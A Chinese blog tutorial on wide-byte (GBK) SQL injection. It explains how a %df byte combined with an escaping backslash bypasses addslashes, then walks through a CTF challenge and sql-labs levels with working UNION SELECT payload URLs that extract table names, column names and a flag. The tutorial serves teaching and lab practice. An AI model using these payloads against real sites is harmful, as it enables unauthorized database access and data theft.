宽字节注入详解

最新推荐文章于 2024-04-09 14:58:50 发布
最新推荐文章于 2024-04-09 14:58:50 发布
阅读量1.7w 收藏 118
点赞数 27
分类专栏: Web安全-Sql注入 文章标签: 安全 宽字节注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/123763888
版权

文章目录

1、涉及函数

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符

mysql_escape_string() 转义一个字符串

2、原理分析

先了解一下什么是窄、宽字节已经常见宽字节编码:

  • 当某字符的大小为一个字节时,称其字符为窄字节.

  • 当某字符的大小为两个字节时,称其字符为宽字节.

  • 所有英文默认占一个字节,汉字占两个字节

  • 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等

为什么会产生宽字节注入,其中就涉及到编码格式的问题了,宽字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码格式从而导致产生宽字节注入

如果数据库使用的的是GBK编码而PHP编码为UTF8就可能出现注入问题,原因是程序员为了防止SQL注入,就会调用我们上面所介绍的几种函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应用的作用。但添加的字符的Ascii要大于128,两个字符才能组合成汉字 ,因为前一个ascii码要大于128,才到汉字的范围 ,这一点需要注意。

3、实战

南邮nctf-sql injection 3

https://chinalover.sinaapp.com/SQL-GBK/
https://chinalover.sinaapp.com/SQL-GBK/?id=1
在这里插入图片描述

https://chinalover.sinaapp.com/SQL-GBK/?id=1'
发现被转义了
在这里插入图片描述
发现被转义了,使用最经典的%df

https://chinalover.sinaapp.com/SQL-GBK/?id=-1%df' and 1=1%23
%df与/组成了一个汉字
在这里插入图片描述
爆数据库

https://chinalover.sinaapp.com/SQL-GBK/?id=-1%df' and 1=1 union select 1,database()%23

在这里插入图片描述

爆表名

https://chinalover.sinaapp.com/SQL-GBK/?id=-1%df' and 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23

在这里插入图片描述

爆字段
注意这里要将表名转化为16进制,并在前面加上0x
ctf4—>0x63746634

https://chinalover.sinaapp.com/SQL-GBK/?id=-1%df' and 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

在这里插入图片描述
爆值

https://chinalover.sinaapp.com/SQL-GBK/?id=-1%df' and 1=1 union select 1,(select flag from ctf4)%23

在这里插入图片描述

在靶场SQL-labs32和33关也涉及到了宽字节注入

sql-labs-32关

当输入id=1’时,被转义了:
在这里插入图片描述
加上%df
在这里插入图片描述
在这里插入图片描述
后面的流程就不多说了,注意我们查询表名和列名的时候要将其转化为16进制,并在前面加上0x。

Stray.io
关注
  • 27
    点赞
  • 118
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
宽字节注入(知识点)
qq_39416206的博客
03-11 813
宽字节注入
宽字节注入
笔墨稠思
11-14 1229
魔术引号: 用于防御sql注入的一种方式,在服务端对访问数据库的语句进行过滤,如果发现如:单引号,双引号,反斜杠等字符会被转义。 常见的如 php中的 magic_quotes_gpc java中的PreparedStatement都是开启魔术引号的方式 宽字节注入原理: 当一个服务端(utf-8编码)请求数据库时,数据库使用了gbk或其他非英文编码,某些字符的排序规则在两种不同的编码格式下有所不同,导致了一些字符的拼接方式发生了改变,从而出现宽字节注入 为了绕过魔术引号的转义,我们需要在编码上下手,我们发
SQL注入:宽字节注入
qq_68163788的博客
01-31 1714
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
sql注入之宽字节注入
weixin_45653478的博客
04-09 589
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8425
渗透测试-SQL注入之宽字节注入
宽字节注入%df的理解
tpaer的博客
10-24 5035
关于%df宽字节注入的理解
宽窄字节简介
u011109761的专栏
06-03 807
宽窄字节简介: 什么是宽字节,什么是窄字节?对于新手来说可能比较迷糊,我当初学习的时候也是这样!之前学习了C语言/C++语言,使用的字符串指针就是 char* 类型,C++中的字符串是 string,内部也是对 char* 的封装,那么这些跟宽窄字节有什么关系呢? 其实最早的系统都是窄字节的,也就是我们很常用的 char 因为都是英文的,英文本身就26个字母,再加上其他的一些标点符号之类的,char 也能表示的下,无符号的 char 最多能表示 255个字符,对吧,所以足够用了! 随着,操作系统的国际化,比
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
字节跳动第三届青训营,极简抖音后端项目.zip
最新发布
05-01
6. **安全实践**: 包括但不限于用户认证(OAuth2.0)、数据加密、防止SQL注入和XSS攻击等,这些都是后端开发中的重要环节。 7. **测试与调试**: 学习编写单元测试、集成测试,使用Git进行版本控制,以及利用调试...
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 SQL 注入高级 SQL 工具篇 DNS 注入 &sqlmap 进行 DNS 注入 11 种常见 SQLmap 使用方法 SQL注入工具 SQL注入工具拓展篇 SQL 注入实战篇 - ...宽字节注入详解
第六届字节跳动青训营——后端进阶班.zip
05-01
5. **安全性实践**: 安全是后端开发的重要一环,学员可能学习到身份验证、授权、防止SQL注入、XSS攻击、CSRF防护等安全策略。 6. **分布式系统**: 分布式系统设计和原理,包括CAP理论、一致性哈希、分布式锁和消息...
深入探究宽字节注入漏洞与修补原理
热门推荐
Exploit的小站~
05-10 1万+
 0、前言 最近要为了自动化审计搜集所有PHP漏洞,在整理注入的时候,发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂,网上的文章也说得不是很清楚,于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html,加上我们两个人的讨论,最终有了这一篇深入的研究成果。 1、概述 主要是由于使用了宽字节编码造成的。 什么是字符集? 计算机显...
窄字节与宽字节
zhang_sinner的专栏
03-06 3742
窄字节与宽字节  1、什么是窄字节,什么是宽字节: 英文字符,其大小为1字节的,叫窄字节 英文字符,其大小为2字节的,叫宽字节 2、不管编译器宽窄设置,中文字符默认占2字节,英文字符默认占1字节 如: sizeof(‘你’)  结果是2 ,不管编译器如何设置宽窄 sizeof("你");结果3  中文2字节,结束符1字节  双引号表示字符串,自动添加结束符 sizeof(
宽字节注入原理学习
身高两米不到的博客
03-18 4954
0x01 开篇 本题用到考点是宽字节注入,遇到这种注入类型学习记录。 推荐两篇链接:浅析白盒审计中的字符编码及SQL注入 | 离别歌 Von的博客 | Von Blog 为方便自我下次忘记,总结一下: 1.宽字节涉及到编码问题,便于理解需要看一看 2.宽字节注入现在已经很少见,因为如今的编码大多使用utf-8 常见url编码: 空格 --%20 ' --%27 # --%23 \ --%5c 0x02 原理 我们注入时都会简单输入一个 ' 或者 " ,进行测试,如果数据库过滤不严格就会产生报错
宽字节注入原理
qq_39416206的博客
03-30 5020
宽字节注入原理
C/C++宽窄字符转换与输出(多种方法)
余识-
02-28 7619
使用多种方法进行WIndows平台下的宽字符串与窄字符串之间的互相转换。
多字节与宽字节的区别
qq_40595787的博客
09-09 1675
多字节与宽字节 string wstring 互转 多字节字符集(MBCS,Multi-Byte Chactacter Set): 指用多个字节来表示一个字符的字符编码集合。一般英文字母用1Byte,汉语等用2Byte来表示。兼容ASCII 127。 在最初的时候,Internet上只有一种字符集——ANSI的ASCII字符集,它使用7 bits来表示一个 字符,总共表示128个字符,其中包括了 英文字母、数字、标点符号等常用字符。 为了扩充ASCII编码,以用于显示本国的语言,不同的国家和地区制定了不同的
【网络安全】SQL注入--宽字节注入
边缘拼命划水的小陈
04-07 477
我们需要构造成select * from students where name ='運',就可以使用联合查询了。select * from users where name = '\'' 此时因为有两个引号会报错。id值输入1%df%27%20–%20。id值输入1’此时识别结果为1’接来下就可以使用联合查询了。
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入和宽字节注入安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值